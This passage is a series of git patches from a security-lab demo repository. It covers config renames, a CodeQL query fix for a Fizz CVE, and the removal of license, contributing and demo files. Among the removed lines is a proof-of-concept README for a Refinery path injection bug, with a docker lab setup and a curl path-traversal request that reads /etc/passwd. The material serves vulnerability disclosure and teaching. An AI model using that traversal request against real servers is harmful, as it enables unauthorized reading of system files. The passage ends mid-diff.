ql_demos/javascript/.project | 2 +- 4 files changed, 4 insertions(+), 4 deletions(-) diff --git a/ql_demos/cpp/.project b/ql_demos/cpp/.project index 5f9d7d6..e9aa19d 100644 --- a/ql_demos/cpp/.project +++ b/ql_demos/cpp/.project @@ -1,6 +1,6 @@ - cpp + ql-demos-cpp diff --git a/ql_demos/csharp/.project b/ql_demos/csharp/.project index ec33cbc..9ac1023 100644 --- a/ql_demos/csharp/.project +++ b/ql_demos/csharp/.project @@ -1,6 +1,6 @@ - csharp + ql-demos-csharp diff --git a/ql_demos/java/.project b/ql_demos/java/.project index 6508e1b..dd7052d 100644 --- a/ql_demos/java/.project +++ b/ql_demos/java/.project @@ -1,6 +1,6 @@ - java + ql-demos-java diff --git a/ql_demos/javascript/.project b/ql_demos/javascript/.project index bc5b8b6..fea4fb6 100644 --- a/ql_demos/javascript/.project +++ b/ql_demos/javascript/.project @@ -1,6 +1,6 @@ - javascript + ql-demos-javascript From 6a0bd77887ef11860d72ffad2d39010f5217827f Mon Sep 17 00:00:00 2001 From: Kevin Backhouse Date: Tue, 15 Oct 2019 10:56:48 +0100 Subject: [PATCH 32/36] Fix Fizz query after a backwards-incompatible change happened in the IR dataflow library. --- .../Facebook_Fizz_CVE-2019-3560/FizzOverflow.ql | 16 ++++++++++++---- 1 file changed, 12 insertions(+), 4 deletions(-) diff --git a/ql_demos/cpp/Facebook_Fizz_CVE-2019-3560/FizzOverflow.ql b/ql_demos/cpp/Facebook_Fizz_CVE-2019-3560/FizzOverflow.ql index f05154b..8e50dcf 100644 --- a/ql_demos/cpp/Facebook_Fizz_CVE-2019-3560/FizzOverflow.ql +++ b/ql_demos/cpp/Facebook_Fizz_CVE-2019-3560/FizzOverflow.ql @@ -27,13 +27,21 @@ class Cfg extends TaintTracking::Configuration { /** Holds if `source` is a call to `Endian::big()`. */ override predicate isSource(DataFlow::Node source) { - source.(CallInstruction).getCallTarget().(FunctionInstruction).getFunctionSymbol() instanceof - EndianConvert + source + .asInstruction() + .(CallInstruction) + .getCallTarget() + .(FunctionInstruction) + .getFunctionSymbol() instanceof EndianConvert } /** Hold if `sink` is a narrowing conversion. */ override predicate isSink(DataFlow::Node sink) { - sink.getResultSize() < sink.(ConvertInstruction).getUnary().getResultSize() + sink.asInstruction().getResultSize() < sink + .asInstruction() + .(ConvertInstruction) + .getUnary() + .getResultSize() } } @@ -42,7 +50,7 @@ from Type inputType, Type outputType where cfg.hasFlowPath(source, sink) and - conv = sink.getNode() and + conv = sink.getNode().asInstruction() and inputType = conv.getUnary().getResultType() and outputType = conv.getResultType() select sink, source, sink, From 43beb3b161cd126f8958c3295d1426b66f1c3e0d Mon Sep 17 00:00:00 2001 From: Kevin Backhouse Date: Wed, 6 Nov 2019 15:56:53 +0000 Subject: [PATCH 33/36] Add qlpack.yml files. --- ql_demos/cpp/qlpack.yml | 3 +++ ql_demos/csharp/qlpack.yml | 3 +++ ql_demos/java/qlpack.yml | 3 +++ ql_demos/javascript/qlpack.yml | 3 +++ 4 files changed, 12 insertions(+) create mode 100644 ql_demos/cpp/qlpack.yml create mode 100644 ql_demos/csharp/qlpack.yml create mode 100644 ql_demos/java/qlpack.yml create mode 100644 ql_demos/javascript/qlpack.yml diff --git a/ql_demos/cpp/qlpack.yml b/ql_demos/cpp/qlpack.yml new file mode 100644 index 0000000..6b427c1 --- /dev/null +++ b/ql_demos/cpp/qlpack.yml @@ -0,0 +1,3 @@ +name: codeql-custom-queries-cpp +version: 0.0.0 +libraryPathDependencies: codeql-cpp diff --git a/ql_demos/csharp/qlpack.yml b/ql_demos/csharp/qlpack.yml new file mode 100644 index 0000000..a6be5d8 --- /dev/null +++ b/ql_demos/csharp/qlpack.yml @@ -0,0 +1,3 @@ +name: codeql-custom-queries-csharp +version: 0.0.0 +libraryPathDependencies: codeql-csharp diff --git a/ql_demos/java/qlpack.yml b/ql_demos/java/qlpack.yml new file mode 100644 index 0000000..23ece19 --- /dev/null +++ b/ql_demos/java/qlpack.yml @@ -0,0 +1,3 @@ +name: codeql-custom-queries-java +version: 0.0.0 +libraryPathDependencies: codeql-java diff --git a/ql_demos/javascript/qlpack.yml b/ql_demos/javascript/qlpack.yml new file mode 100644 index 0000000..3d143f9 --- /dev/null +++ b/ql_demos/javascript/qlpack.yml @@ -0,0 +1,3 @@ +name: codeql-custom-queries-javascript +version: 0.0.0 +libraryPathDependencies: codeql-javascript From ef20634dd1a061d6dcff862daaedfa7f003c68ef Mon Sep 17 00:00:00 2001 From: Kevin Backhouse Date: Thu, 7 Nov 2019 18:08:32 +0000 Subject: [PATCH 34/36] Fix typo --- ql_demos/cpp/Facebook_Fizz_CVE-2019-3560/FizzOverflow.ql | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql_demos/cpp/Facebook_Fizz_CVE-2019-3560/FizzOverflow.ql b/ql_demos/cpp/Facebook_Fizz_CVE-2019-3560/FizzOverflow.ql index 8e50dcf..9039d2f 100644 --- a/ql_demos/cpp/Facebook_Fizz_CVE-2019-3560/FizzOverflow.ql +++ b/ql_demos/cpp/Facebook_Fizz_CVE-2019-3560/FizzOverflow.ql @@ -35,7 +35,7 @@ class Cfg extends TaintTracking::Configuration { .getFunctionSymbol() instanceof EndianConvert } - /** Hold if `sink` is a narrowing conversion. */ + /** Holds if `sink` is a narrowing conversion. */ override predicate isSink(DataFlow::Node sink) { sink.asInstruction().getResultSize() < sink .asInstruction() From 53e423cd397d7e026a7646e4530a1caef6589fea Mon Sep 17 00:00:00 2001 From: Kevin Backhouse Date: Fri, 8 Nov 2019 10:10:25 +0000 Subject: [PATCH 35/36] Change qlpack names --- ql_demos/cpp/qlpack.yml | 2 +- ql_demos/csharp/qlpack.yml | 2 +- ql_demos/java/qlpack.yml | 2 +- ql_demos/javascript/qlpack.yml | 2 +- 4 files changed, 4 insertions(+), 4 deletions(-) diff --git a/ql_demos/cpp/qlpack.yml b/ql_demos/cpp/qlpack.yml index 6b427c1..12a2c1b 100644 --- a/ql_demos/cpp/qlpack.yml +++ b/ql_demos/cpp/qlpack.yml @@ -1,3 +1,3 @@ -name: codeql-custom-queries-cpp +name: codeql-demos-cpp version: 0.0.0 libraryPathDependencies: codeql-cpp diff --git a/ql_demos/csharp/qlpack.yml b/ql_demos/csharp/qlpack.yml index a6be5d8..a6e22f5 100644 --- a/ql_demos/csharp/qlpack.yml +++ b/ql_demos/csharp/qlpack.yml @@ -1,3 +1,3 @@ -name: codeql-custom-queries-csharp +name: codeql-demos-csharp version: 0.0.0 libraryPathDependencies: codeql-csharp diff --git a/ql_demos/java/qlpack.yml b/ql_demos/java/qlpack.yml index 23ece19..42457d1 100644 --- a/ql_demos/java/qlpack.yml +++ b/ql_demos/java/qlpack.yml @@ -1,3 +1,3 @@ -name: codeql-custom-queries-java +name: codeql-demos-java version: 0.0.0 libraryPathDependencies: codeql-java diff --git a/ql_demos/javascript/qlpack.yml b/ql_demos/javascript/qlpack.yml index 3d143f9..0c9e262 100644 --- a/ql_demos/javascript/qlpack.yml +++ b/ql_demos/javascript/qlpack.yml @@ -1,3 +1,3 @@ -name: codeql-custom-queries-javascript +name: codeql-demos-javascript version: 0.0.0 libraryPathDependencies: codeql-javascript From 138e0216fc460e12e9b0d91ccaae15ea589129c6 Mon Sep 17 00:00:00 2001 From: Kevin Backhouse Date: Fri, 15 Nov 2019 15:08:07 -0800 Subject: [PATCH 36/36] Remove files that are not needed in the security-lab repo. --- CODE_OF_CONDUCT.md | 39 ---- CONTRIBUTING.md | 46 ----- COPYRIGHT | 13 -- LICENSE | 176 ------------------ README.md | 15 -- .../amphtml_PR_integration/README.md | 3 - .../python/Refinery/ExploitPoC/README.md | 69 ------- .../ExploitPoC/refinery-attacker/Dockerfile | 11 -- .../ExploitPoC/refinery-server/Dockerfile | 31 --- .../ExploitPoC/refinery-server/diff.txt | 38 ---- lgtm_demos/python/Refinery/README.md | 11 -- 11 files changed, 452 deletions(-) delete mode 100644 CODE_OF_CONDUCT.md delete mode 100644 CONTRIBUTING.md delete mode 100644 COPYRIGHT delete mode 100644 LICENSE delete mode 100644 README.md delete mode 100644 lgtm_demos/javascript/amphtml_PR_integration/README.md delete mode 100644 lgtm_demos/python/Refinery/ExploitPoC/README.md delete mode 100644 lgtm_demos/python/Refinery/ExploitPoC/refinery-attacker/Dockerfile delete mode 100644 lgtm_demos/python/Refinery/ExploitPoC/refinery-server/Dockerfile delete mode 100644 lgtm_demos/python/Refinery/ExploitPoC/refinery-server/diff.txt delete mode 100644 lgtm_demos/python/Refinery/README.md diff --git a/CODE_OF_CONDUCT.md b/CODE_OF_CONDUCT.md deleted file mode 100644 index ed69d4a..0000000 --- a/CODE_OF_CONDUCT.md +++ /dev/null @@ -1,39 +0,0 @@ -# Code of Conduct - -This code of conduct outlines expectations for participation in the Semmle open source community, including any open source repositories on GitHub.com, as well as steps for reporting unacceptable behavior. We are committed to providing a welcoming and inspiring community for all. - -People violating this code of conduct may be banned from the community. - -Our community strives to: -* Be friendly and patient: Remember you might not be communicating in someone else’s primary spoken or programming language, and others may not have your level of understanding. -* Be welcoming: Our community welcomes and supports people of all backgrounds and identities. This includes, but is not limited to members of any race, ethnicity, culture, national origin, color, immigration status, social and economic class, educational level, sex, sexual orientation, gender identity and expression, age, size, family status, political belief, religion, and mental and physical ability. -* Be respectful: We are a world-wide community of professionals, and we conduct ourselves professionally. Disagreement is no excuse for poor behavior and poor manners. Disrespectful and unacceptable behavior includes, but is not limited to: - * Violent threats or language. - * Discriminatory or derogatory jokes and language. - * Posting sexually explicit or violent material. - * Posting, or threatening to post, people’s personally identifying information (“doxing”). - * Insults, especially those using discriminatory terms or slurs. - * Behavior that could be perceived as sexual attention. -* Advocating for or encouraging any of the above behaviors. -* Understand disagreements: Disagreements, both social and technical, are useful learning opportunities. Seek to understand others’ viewpoints and resolve differences constructively. - -This code is not exhaustive or complete. It serves to capture our common understanding of a productive, collaborative environment. We expect the code to be followed in spirit as much as in the letter. - -# Scope - -This code of conduct applies to all repositories and communities for Semmle open source projects, regardless of whether or not the repository explicitly calls out its use of this code. The code also applies in public spaces when an individual is representing the Semmle open source community. Examples include using an official project email address, posting via an official social media account, or acting as an appointed representative at an online or offline event. - - -# Reporting Code of Conduct Issues -We encourage members of the community to resolve issues on their own whenever possible. This builds a broader and deeper understanding and ultimately a healthier interaction. In the event that an issue cannot be resolved locally, please feel free to report your concerns by contacting code-of-conduct@semmle.com. -In your report please include: -* Your contact information. -* Names (real, usernames or pseudonyms) of any individuals involved. If there are additional witnesses, please include them as well. -* Your account of what occurred, and if you believe the incident is ongoing. If there is a publicly available record (e.g. a mailing list archive or a public chat log), please include a link or attachment. -* Any additional information that may be helpful. - -All reports will be reviewed by a multi-person team and will result in a response that is deemed necessary and appropriate to the circumstances. Where additional perspectives are needed, the team may seek insight from others with relevant expertise or experience. The confidentiality of the person reporting the incident will be kept at all times. Involved parties are never part of the review team. - -Anyone asked to stop unacceptable behavior is expected to comply immediately. If an individual engages in unacceptable behavior, the review team may take any action they deem appropriate, including a permanent ban from the community. - -*This text is licensed under the [CC-BY-4.0](https://creativecommons.org/licenses/by/4.0/) license. It is based on a template established by the [TODO Group](http://todogroup.org/) and variants thereof used by numerous other large communities (e.g., [Microsoft](https://microsoft.github.io/codeofconduct/), [Facebook](https://code.fb.com/codeofconduct/), [Yahoo](https://yahoo.github.io/codeofconduct), [Twitter](https://github.com/twitter/code-of-conduct), [GitHub](https://blog.github.com/2015-07-20-adopting-the-open-code-of-conduct/)) and the Scope section from the [Contributor Covenant version 1.4](http://contributor-covenant.org/version/1/4/).* diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md deleted file mode 100644 index 7e7620e..0000000 --- a/CONTRIBUTING.md +++ /dev/null @@ -1,46 +0,0 @@ -# Contributing to Semmle open-source projects - -We welcome contributions to our project. If you have an idea or a bugfix then please go ahead an open a Pull Request! - -Before we accept your pull request, we will require that you have agreed to our Contributor License Agreement. This is not something that you need to do before you submit your pull request, but until you've done so, we will be unable to accept your contribution. - -## Using your personal data - -If you contribute to this project, we will record your name and email -address (as provided by you with your contributions) as part of the code -repositories, which might be made public. We might also use this information -to contact you in relation to your contributions, as well as in the -normal course of software development. We also store records of your -CLA agreements. Under GDPR legislation, we do this -on the basis of our legitimate interest in creating the QL product. - -Please do get in touch (privacy@semmle.com) if you have any questions about -this or our data protection policies. - -## Contributor License Agreement - -This Contributor License Agreement (“Agreement”) is entered into between Semmle Limited (“Semmle,” “we” or “us” etc.), and You (as defined and further identified below). - -Accordingly, You hereby agree to the following terms for Your present and future Contributions submitted to Semmle: - -1. **Definitions**. - - * "You" (or "Your") shall mean the Contribution copyright owner (whether an individual or organization) or legal entity authorized by the copyright owner that is making this Agreement with Semmle. For legal entities, the entity making a Contribution and all other entities that control, are controlled by, or are under common control with that entity are considered to be a single Contributor. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity. - - * "Contribution(s)" shall mean the code, documentation or other original works of authorship, including any modifications or additions to an existing work, submitted by You to Semmle for inclusion in, or documentation of, any of the products or projects owned or managed by Semmle (the "Work(s)"). For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to Semmle or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, Semmle for the purpose of discussing and/or improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by You as "Not a Contribution." - -2. **Grant of Copyright License**. You hereby grant to Semmle and to recipients of software distributed by Semmle a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare derivative works of, publicly display, publicly perform, sublicense, and distribute Your Contributions and such derivative works. - -3. **Grant of Patent License**. You hereby grant to Semmle and to recipients of software distributed by Semmle a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by You that are necessarily infringed by Your Contribution(s) alone or by combination of Your Contribution(s) with the Work to which such Contribution(s) was submitted. If any entity institutes patent litigation against You or any other entity (including a cross-claim or counterclaim in a lawsuit) alleging that Your Contribution, or the Work to which You have contributed, constitutes direct or contributory patent infringement, then any patent licenses granted to that entity under this Agreement for that Contribution or Work shall terminate as of the date such litigation is filed. - -4. **Ownership**. Except as set out above, You keep all right, title, and interest in Your Contribution. The rights that You grant to us under this Agreement are effective on the date You first submitted a Contribution to us, even if Your submission took place before the date You entered this Agreement. - -5. **Representations**. You represent and warrant that: (i) the Contributions are an original work and that You can legally grant the rights set out in this Agreement; (ii) the Contributions and Semmle’s exercise of any license rights granted hereunder, does not and will not, infringe the rights of any third party; (iii) You are not aware of any pending or threatened claims, suits, actions, or charges pertaining to the Contributions, including without limitation any claims or allegations that any or all of the Contributions infringes, violates, or misappropriate the intellectual property rights of any third party (You further agree that You will notify Semmle immediately if You become aware of any such actual or potential claims, suits, actions, allegations or charges). - -6. **Employer**. If Your employer(s) has rights to intellectual property that You create that includes Your Contributions, You represent and warrant that Your employer has waived such rights for Your Contributions to Semmle, or that You have received permission to make Contributions on behalf of that employer and that You are authorized to execute this Agreement on behalf of Your employer. - -7. **Inclusion of Code**. We determine the code that is in our Works. You understand that the decision to include the Contribution in any project or source repository is entirely that of Semmle, and this agreement does not guarantee that the Contributions will be included in any product. - -8. **Disclaimer**. You are not expected to provide support for Your Contributions, except to the extent You desire to provide support. You may provide support for free, for a fee, or not at all. Except as set forth herein, and unless required by applicable law or agreed to in writing, You provide Your Contributions on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND. - -9. **General**. The failure of either party to enforce its rights under this Agreement for any period shall not be construed as a waiver of such rights. No changes or modifications or waivers to this Agreement will be effective unless in writing and signed by both parties. In the event that any provision of this Agreement shall be determined to be illegal or unenforceable, that provision will be limited or eliminated to the minimum extent necessary so that this Agreement shall otherwise remain in full force and effect and enforceable. This Agreement shall be governed by and construed in accordance with the laws of the State of California in the United States without regard to the conflicts of laws provisions thereof. In any action or proceeding to enforce rights under this Agreement, the prevailing party will be entitled to recover costs and attorneys’ fees. diff --git a/COPYRIGHT b/COPYRIGHT deleted file mode 100644 index 65d947f..0000000 --- a/COPYRIGHT +++ /dev/null @@ -1,13 +0,0 @@ -Copyright (c) Semmle Inc and other contributors. All rights reserved. - -Licensed under the Apache License, Version 2.0 (the "License"); you may not use -this file except in compliance with the License. You may obtain a copy of the -License at http://www.apache.org/licenses/LICENSE-2.0 - -THIS CODE IS PROVIDED ON AN *AS IS* BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -KIND, EITHER EXPRESS OR IMPLIED, INCLUDING WITHOUT LIMITATION ANY IMPLIED -WARRANTIES OR CONDITIONS OF TITLE, FITNESS FOR A PARTICULAR PURPOSE, -MERCHANTABLITY OR NON-INFRINGEMENT. - -See the Apache Version 2.0 License for specific language governing permissions -and limitations under the License. diff --git a/LICENSE b/LICENSE deleted file mode 100644 index d9a10c0..0000000 --- a/LICENSE +++ /dev/null @@ -1,176 +0,0 @@ - Apache License - Version 2.0, January 2004 - http://www.apache.org/licenses/ - - TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION - - 1. Definitions. - - "License" shall mean the terms and conditions for use, reproduction, - and distribution as defined by Sections 1 through 9 of this document. - - "Licensor" shall mean the copyright owner or entity authorized by - the copyright owner that is granting the License. - - "Legal Entity" shall mean the union of the acting entity and all - other entities that control, are controlled by, or are under common - control with that entity. For the purposes of this definition, - "control" means (i) the power, direct or indirect, to cause the - direction or management of such entity, whether by contract or - otherwise, or (ii) ownership of fifty percent (50%) or more of the - outstanding shares, or (iii) beneficial ownership of such entity. - - "You" (or "Your") shall mean an individual or Legal Entity - exercising permissions granted by this License. - - "Source" form shall mean the preferred form for making modifications, - including but not limited to software source code, documentation - source, and configuration files. - - "Object" form shall mean any form resulting from mechanical - transformation or translation of a Source form, including but - not limited to compiled object code, generated documentation, - and conversions to other media types. - - "Work" shall mean the work of authorship, whether in Source or - Object form, made available under the License, as indicated by a - copyright notice that is included in or attached to the work - (an example is provided in the Appendix below). - - "Derivative Works" shall mean any work, whether in Source or Object - form, that is based on (or derived from) the Work and for which the - editorial revisions, annotations, elaborations, or other modifications - represent, as a whole, an original work of authorship. For the purposes - of this License, Derivative Works shall not include works that remain - separable from, or merely link (or bind by name) to the interfaces of, - the Work and Derivative Works thereof. - - "Contribution" shall mean any work of authorship, including - the original version of the Work and any modifications or additions - to that Work or Derivative Works thereof, that is intentionally - submitted to Licensor for inclusion in the Work by the copyright owner - or by an individual or Legal Entity authorized to submit on behalf of - the copyright owner. For the purposes of this definition, "submitted" - means any form of electronic, verbal, or written communication sent - to the Licensor or its representatives, including but not limited to - communication on electronic mailing lists, source code control systems, - and issue tracking systems that are managed by, or on behalf of, the - Licensor for the purpose of discussing and improving the Work, but - excluding communication that is conspicuously marked or otherwise - designated in writing by the copyright owner as "Not a Contribution." - - "Contributor" shall mean Licensor and any individual or Legal Entity - on behalf of whom a Contribution has been received by Licensor and - subsequently incorporated within the Work. - - 2. Grant of Copyright License. Subject to the terms and conditions of - this License, each Contributor hereby grants to You a perpetual, - worldwide, non-exclusive, no-charge, royalty-free, irrevocable - copyright license to reproduce, prepare Derivative Works of, - publicly display, publicly perform, sublicense, and distribute the - Work and such Derivative Works in Source or Object form. - - 3. Grant of Patent License. Subject to the terms and conditions of - this License, each Contributor hereby grants to You a perpetual, - worldwide, non-exclusive, no-charge, royalty-free, irrevocable - (except as stated in this section) patent license to make, have made, - use, offer to sell, sell, import, and otherwise transfer the Work, - where such license applies only to those patent claims licensable - by such Contributor that are necessarily infringed by their - Contribution(s) alone or by combination of their Contribution(s) - with the Work to which such Contribution(s) was submitted. If You - institute patent litigation against any entity (including a - cross-claim or counterclaim in a lawsuit) alleging that the Work - or a Contribution incorporated within the Work constitutes direct - or contributory patent infringement, then any patent licenses - granted to You under this License for that Work shall terminate - as of the date such litigation is filed. - - 4. Redistribution. You may reproduce and distribute copies of the - Work or Derivative Works thereof in any medium, with or without - modifications, and in Source or Object form, provided that You - meet the following conditions: - - (a) You must give any other recipients of the Work or - Derivative Works a copy of this License; and - - (b) You must cause any modified files to carry prominent notices - stating that You changed the files; and - - (c) You must retain, in the Source form of any Derivative Works - that You distribute, all copyright, patent, trademark, and - attribution notices from the Source form of the Work, - excluding those notices that do not pertain to any part of - the Derivative Works; and - - (d) If the Work includes a "NOTICE" text file as part of its - distribution, then any Derivative Works that You distribute must - include a readable copy of the attribution notices contained - within such NOTICE file, excluding those notices that do not - pertain to any part of the Derivative Works, in at least one - of the following places: within a NOTICE text file distributed - as part of the Derivative Works; within the Source form or - documentation, if provided along with the Derivative Works; or, - within a display generated by the Derivative Works, if and - wherever such third-party notices normally appear. The contents - of the NOTICE file are for informational purposes only and - do not modify the License. You may add Your own attribution - notices within Derivative Works that You distribute, alongside - or as an addendum to the NOTICE text from the Work, provided - that such additional attribution notices cannot be construed - as modifying the License. - - You may add Your own copyright statement to Your modifications and - may provide additional or different license terms and conditions - for use, reproduction, or distribution of Your modifications, or - for any such Derivative Works as a whole, provided Your use, - reproduction, and distribution of the Work otherwise complies with - the conditions stated in this License. - - 5. Submission of Contributions. Unless You explicitly state otherwise, - any Contribution intentionally submitted for inclusion in the Work - by You to the Licensor shall be under the terms and conditions of - this License, without any additional terms or conditions. - Notwithstanding the above, nothing herein shall supersede or modify - the terms of any separate license agreement you may have executed - with Licensor regarding such Contributions. - - 6. Trademarks. This License does not grant permission to use the trade - names, trademarks, service marks, or product names of the Licensor, - except as required for reasonable and customary use in describing the - origin of the Work and reproducing the content of the NOTICE file. - - 7. Disclaimer of Warranty. Unless required by applicable law or - agreed to in writing, Licensor provides the Work (and each - Contributor provides its Contributions) on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or - implied, including, without limitation, any warranties or conditions - of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A - PARTICULAR PURPOSE. You are solely responsible for determining the - appropriateness of using or redistributing the Work and assume any - risks associated with Your exercise of permissions under this License. - - 8. Limitation of Liability. In no event and under no legal theory, - whether in tort (including negligence), contract, or otherwise, - unless required by applicable law (such as deliberate and grossly - negligent acts) or agreed to in writing, shall any Contributor be - liable to You for damages, including any direct, indirect, special, - incidental, or consequential damages of any character arising as a - result of this License or out of the use or inability to use the - Work (including but not limited to damages for loss of goodwill, - work stoppage, computer failure or malfunction, or any and all - other commercial damages or losses), even if such Contributor - has been advised of the possibility of such damages. - - 9. Accepting Warranty or Additional Liability. While redistributing - the Work or Derivative Works thereof, You may choose to offer, - and charge a fee for, acceptance of support, warranty, indemnity, - or other liability obligations and/or rights consistent with this - License. However, in accepting such obligations, You may act only - on Your own behalf and on Your sole responsibility, not on behalf - of any other Contributor, and only if You agree to indemnify, - defend, and hold each Contributor harmless for any liability - incurred by, or claims asserted against, such Contributor by reason - of your accepting any such warranty or additional liability. - - END OF TERMS AND CONDITIONS diff --git a/README.md b/README.md deleted file mode 100644 index b4a319a..0000000 --- a/README.md +++ /dev/null @@ -1,15 +0,0 @@ -# Semmle Demos - -This open source repository contains demos of Semmle's products: [QL](https://semmle.com/ql) and [LGTM](https://lgtm.com/). Many of the demos are examples of security vulnerabilities that were found by a QL query. These demos contain step-by-step instructions on how to build a QL query that finds the vulnerability. - -## How do I run the demos? - -Each demo consists of a snapshot database and a series of query files. Each query is annotated with useful information to explain its purpose. To run a demo, import the associated files into the [QL for Eclipse](https://lgtm.com/help/lgtm/running-queries-ide) plugin, and run the queries. For detailed instructions on installing QL for Eclipse, importing snapshots, and running queries, see the [QL for Eclipse online help](https://help.semmle.com/ql-for-eclipse/Content/WebHelp/install-plugin-free.html). You can also run the queries in the [interactive query console](https://lgtm.com/help/lgtm/using-query-console) on LGTM. - -## How do I learn more about QL? - -QL is Semmle's variant analysis engine, and there is [extensive documentation](https://help.semmle.com/QL/learn-ql/) available to help you learn to write your own queries. You can also explore the QL queries and libraries by visiting the [Semmle/ql repository](https://github.com/semmle/ql). QL is open source, and we welcome contributions or improvements from the community–see our [contributing guidelines](https://github.com/Semmle/ql/blob/master/CONTRIBUTING.md) for further information. - -## License - -The demos are licensed under [Apache License 2.0](LICENSE) by [Semmle](https://semmle.com). diff --git a/lgtm_demos/javascript/amphtml_PR_integration/README.md b/lgtm_demos/javascript/amphtml_PR_integration/README.md deleted file mode 100644 index 5e76ef4..0000000 --- a/lgtm_demos/javascript/amphtml_PR_integration/README.md +++ /dev/null @@ -1,3 +0,0 @@ -# AMP HTML pull-request integration - -[Pull Request #13060](https://github.com/ampproject/amphtml/pull/13060) is a great example of LGTM's pull-request integration feature. In this pull request, [@lannka](https://github.com/lannka) wants to revert a change made by [@rsimha](https://github.com/rsimha) because it "breaks the regex". Within 15 minutes, LGTM posted a [comment](https://github.com/ampproject/amphtml/pull/13060#issuecomment-360860032) on the pull request, saying that it introduces a new alert for "Regular expression injection". As [@rsimha](https://github.com/rsimha) explains in the next [comment](https://github.com/ampproject/amphtml/pull/13060#issuecomment-360865628), he changed the regular expression to fix a security vulnerability. This pull request was going to reintroduce the vulnerability! Luckily, LGTM caught the problem quickly and the pull request was fixed before it got merged. diff --git a/lgtm_demos/python/Refinery/ExploitPoC/README.md b/lgtm_demos/python/Refinery/ExploitPoC/README.md deleted file mode 100644 index 23f9027..0000000 --- a/lgtm_demos/python/Refinery/ExploitPoC/README.md +++ /dev/null @@ -1,69 +0,0 @@ -# Path injection in Refinery - -This directory contains a proof-of-concept exploit for a path injection vulnerability in [Refinery](https://github.com/daeilkim/refinery). - -To demonstrate the PoC in a safe environment, we will use two docker containers connected by a docker network bridge to simulate two separate computers: the first is the Refinery server and the second is the attacker's computer. - -We have tried to make the `Dockerfile`'s for the server and attacker as simple as possible, to make it clear that we have used vanilla [Ubuntu 18.04](http://releases.ubuntu.com/18.04/) with no unusual packages installed. - -## Network setup - -Create a docker network bridge, to simulate a network with two separate computers. - -```bash -docker network create -d bridge --subnet 172.18.0.0/16 refinery-demo-network -``` - -## Refinery server setup - -Build the docker image: - -```bash -cd refinery-server -docker build . -t refinery-server --build-arg UID=`id -u` -``` - -Start the container: - -```bash -docker run --rm --network refinery-demo-network --ip=172.18.0.10 -h refinery-server --publish 8080:8080 -i -t refinery-server -``` - -Inside the container, start postgresql and Refinery. - -```bash -sudo service postgresql start # sudo password is "x" -sudo -u postgres createuser --superuser victim -sudo -u postgres createdb refinery -cd refinery/refinery -./reset_db.py -./start_refinery.sh -``` - -At this point, you can check that Refinery is running by visiting [http://127.0.0.1:8080](http://127.0.0.1:8080) in your browser. (We exposed port 8080 on the docker container.) You should see a login screen. These are the default credentials: - -``` -username: doc -password: refinery -``` - -## Attacker setup - -Build the docker image: - -```bash -cd refinery-attacker -docker build . -t refinery-attacker -``` - -Start the container: - -```bash -docker run --rm --network refinery-demo-network --ip=172.18.0.11 -h refinery-attacker -i -t refinery-attacker -``` - -Inside the container, use `curl` to read arbitrary files on the server: - -```bash -curl -d "filename=../../../../../../../../../../../../../../etc/passwd" -X POST http://172.18.0.10:8080/doc/get_doc_text -``` diff --git a/lgtm_demos/python/Refinery/ExploitPoC/refinery-attacker/Dockerfile b/lgtm_demos/python/Refinery/ExploitPoC/refinery-attacker/Dockerfile deleted file mode 100644 index 0745e0c..0000000 --- a/lgtm_demos/python/Refinery/ExploitPoC/refinery-attacker/Dockerfile +++ /dev/null @@ -1,11 +0,0 @@ -FROM ubuntu:bionic - -RUN apt-get update && \ - apt-get install -y curl - -# Create user account for the attacker. -RUN adduser attacker --disabled-password - -# Switch over to the 'attacker' user, since root access is no longer required -USER attacker -WORKDIR /home/attacker diff --git a/lgtm_demos/python/Refinery/ExploitPoC/refinery-server/Dockerfile b/lgtm_demos/python/Refinery/ExploitPoC/refinery-server/Dockerfile deleted file mode 100644 index 698be3d..0000000 --- a/lgtm_demos/python/Refinery/ExploitPoC/refinery-server/Dockerfile +++ /dev/null @@ -1,31 +0,0 @@ -FROM ubuntu:bionic - -RUN echo "Etc/UTC" > /etc/timezone -ENV DEBIAN_FRONTEND=noninteractive - -RUN apt-get update && \ - apt-get install -y git python-pip postgresql redis-server gunicorn sudo - -ARG UID=1000 - -# Create a non-root user account to run Refinery. -RUN adduser victim --disabled-password --uid $UID - -# Grant the 'victim' user sudo access, so that we can start postgresql. -RUN adduser victim sudo -RUN echo "victim:x" | chpasswd - -# Switch over to the 'victim' user, since root access is no longer required -USER victim -WORKDIR /home/victim - -# Some of the Python module names have changed since the Refinery code -# was written, so we have to apply a simple patch. -COPY diff.txt /home/victim/diff.txt - -# Get Refinery source code and check out the vulnerable version. -RUN git clone https://github.com/daeilkim/refinery && cd refinery && \ - git checkout 0d5de8fc3d680a2c79bd0e9384b506229787c74f && \ - git apply /home/victim/diff.txt - -RUN pip install flask flask_login flask_sqlalchemy flask_wtf celery joblib psycopg2 redis scipy diff --git a/lgtm_demos/python/Refinery/ExploitPoC/refinery-server/diff.txt b/lgtm_demos/python/Refinery/ExploitPoC/refinery-server/diff.txt deleted file mode 100644 index 74cc4e5..0000000 --- a/lgtm_demos/python/Refinery/ExploitPoC/refinery-server/diff.txt +++ /dev/null @@ -1,38 +0,0 @@ -diff --git a/refinery/refinery/__init__.py b/refinery/refinery/__init__.py -index 3bd6a8b..4ad1311 100644 ---- a/refinery/refinery/__init__.py -+++ b/refinery/refinery/__init__.py -@@ -1,6 +1,6 @@ - from flask import Flask --from flask.ext.sqlalchemy import SQLAlchemy --from flask.ext.login import LoginManager -+from 